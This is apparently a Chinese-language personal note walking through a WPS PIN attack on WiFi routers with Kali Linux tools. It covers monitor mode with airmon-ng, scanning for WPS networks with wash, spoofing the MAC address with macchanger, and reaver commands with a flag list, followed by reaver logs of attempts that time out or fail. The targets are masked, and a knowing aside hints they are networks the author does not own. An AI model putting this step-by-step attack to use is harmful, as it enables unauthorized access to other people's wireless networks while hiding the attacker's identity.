在神奇的kali下:
sudo airmon-ng check kill
sudo airmon-ng start wlan0
扫描开启WPS的WIFI
sudo wash -i wlan0mon //只显示开启的 sudo wash -i wlan0mon -a //显示所有的
显示效果:省了(你懂得。。。)
在监听模式未开启前给网卡设置一下mac:
sudo macchanger -m 00:11:22:33:44:55 wlan0 如果已经开启监听模式先关闭: sudo airmon-ng stop wlan0mon
reaver的pin码测试:
-i,开启了监听模式的网络接口名 -b,要探测的Wifi的BSSID -c,信道 -5,使用5G信道 -v,显示具体信息,-vv或者-vvv可以显示更加详细的信息 -q,仅显示关键信息 -p,要使用的PIN -d,尝试PIN之间的间隔时间(默认1) -l,如果路由器锁定尝试PIN,等待的时间(默认60) -g,最大尝试次数,到达次数之后命令会停止 -x,10次意外失败之后的等待时间(默认0) -t,接收超时周期(默认10) -F,忽略帧校验错误
运行(如果已经知道pin得到密码)
sudo reaver -i wlan0mon -b XXXXXXX -p 01102511 -vv
如果轮寻:
sudo reaver -i wlan0mon -b XXXXXXXXXXXX -vv
查看运行过程:
Reaver v1.6.6 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com> [+] Waiting for beacon from XXXXXXXXXXXXXXX [+] Switching wlan0mon to channel 11 [+] Received beacon from XXXXXXXXXXXXXXX [+] Vendor:XXXXXX [+] Trying pin "01102511" [+] Sending authentication request [+] Sending association request [+] Associated with XXXXXXXXXXXXXXXX (ESSID: XXXX) [+] Sending EAPOL START request [!] WARNING: Receive timeout occurred [+] Sending EAPOL START request [!] WARNING: Receive timeout occurred
然后一直超时。。。。。。。。。。。
选个wps:1.0版本的mac试试:
[+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received M1 message [+] Sending M2 message [+] Received M1 message [+] Sending WSC NACK [+] Sending WSC NACK [!] WPS transaction failed (code: 0x03), re-trying last pin
有所区别,但是。。。pin多了也会超时。。。